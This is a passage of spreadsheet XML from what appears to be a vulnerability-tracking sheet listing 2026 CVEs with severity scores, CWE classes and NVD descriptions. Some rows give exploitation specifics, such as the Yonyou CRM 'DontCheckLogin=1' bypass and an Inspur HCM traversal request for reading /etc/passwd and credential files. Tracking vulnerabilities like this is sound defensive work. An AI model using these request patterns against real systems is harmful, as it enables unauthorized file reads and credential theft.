          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Yonyou U8 CRM before V16.5 and V18 contains an arbitrary file read vulnerability in /ajax/getemaildata.php that allows unauthenticated attackers to bypass authentication using the DontCheckLogin=1 parameter and read arbitrary files via an unvalidated filePath parameter. Attackers can exploit this flaw to read sensitive files outside the web application directory, including configuration files containing database or service credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-14.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54403</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58387</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Inspur Haiyue HCM Cloud contains an arbitrary file read vulnerability in the /api/model_report/file/download endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying unvalidated path parameters index and ext. Attackers can craft requests such as /api/model_report/file/download?index=/&amp;ext=&lt;path&gt; to traverse the filesystem and disclose sensitive files including /etc/passwd, application database files, and system configuration files. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-11-04 .</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58387</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101884</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>dotnet</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete environment-variable sanitizer in system.run that fails to block GIT_CONFIG_*, DOTNET_STARTUP_HOOKS, and JAVA_TOOL_OPTIONS variables. Attackers with gateway or agent access can supply these variables to allowlisted tools like git, dotnet, or java to load attacker-controlled code and achieve arbitrary code execution.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101884</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102091</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Secure Data Forms before version 9.5.0 is vulnerable to Server-Side Request Forgery that could allow an unauthenticated, remote attacker to make the server issue arbitrary outbound network requests and read back the responses. This could potentially be used to reach internal-only services or other network-restricted resources.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102091</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102128</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>An identity-verification weakness in Kiteworks Email Protection Gateway allowed the gateway to act on the Kiteworks platform on behalf of a user it had not authenticated, and to provision a platform account for an identity it did not already know. A remote, unauthenticated sender could potentially exploit this to obtain control of a platform account.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102128</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102143</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-434</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker could cause a file with attacker-controlled content to be written to the appliance filesystem through an administrative upload handler that did not properly authenticate the request. This did not by itself result in code execution, which would require a separate vulnerability to place the file in an executable location.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102143</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102717</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-457</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>MQTT WebSocket setter ABI mismatch may disclose memory or cause a crash</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102717</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103472</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>restbed through 5.0.0 accepts WebSocket frames with declared payload lengths up to 2^63 bytes and buffers the payload without size limits in an unbounded stream buffer. Remote unauthenticated attackers can declare large frame sizes and stream payload data to exhaust server memory, causing denial of service through process crash.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103472</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103591</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>DeepWiki-Open through commit d92819a contains an unauthenticated arbitrary file read vulnerability in the GET /codemap/file endpoint via the repo_url parameter. Attackers can supply a non-URL repo_url value to bypass path containment checks and read any file accessible to the API process by specifying absolute file paths.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103591</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6806</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>The Motors – Car Dealership &amp; Classified Listings Plugin plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'stm_lat/stm_lng' parameter in all versions up to, and including, 1.4.109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T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6806</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75098</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>The Product Designer App plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.3 via the 'svg' parameter parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The endpoint's only authentication gate relies on a nonce and token that are both publicly emitted as JavaScript globals on any page rendering the [pdapp-studio-page] shortcode, making them freely obtainable by anonymous visitors.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75098</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76145</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>An improper privilege management vulnerability in Genian SSL PNS allows an attacker to escalate to super administrator privileges and force the creation of an OS account by manipulating the permission column during CSV bulk user registration</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76145</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80276</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 expose a network-accessible management interface that does not require authentication. Through this interface, sensitive device configuration data - including the Remote Configuration Password - can be read in cleartext by a remote, unauthenticated attacker.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80276</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85532</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Apache WSS4J accepted attacker-controlled derived-key lengths and offsets without adequate bounds. This could permit cryptographically weak keys or excessive CPU and memory consumption when processing crafted WS-Security messages. The fixes enforce a minimum key length of 16 bytes, a maximum length of 512 bytes, and a maximum offset of 4096 bytes.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85532</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89294</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.12.27 via the 'ssa_locale'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Notably, exploitation does not require authentication in practice, as the locale filter is installed unconditionally on every request during plugins_loaded and the callback performs no nonce or capability check before returning the raw GET parameter value.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89294</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92121</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>In the WSS4J streaming (StAX) code, a signature reference using the WS-Security STR-Transform leaves an internal "inside signed content" flag permanently set. The WS-SecurityPolicy enforcer uses that flag to decide whether an element needs checking, so it stops evaluating SignedParts and SignedElements for the rest of the message. A policy requiring the SOAP Body to be signed is then satisfied even when the Body carries no signature, removing the protection against XML Signature Wrapping. Signature verification itself is unaffected. The DOM code is not affected. 
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4 which fix this issue.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92121</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92245</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
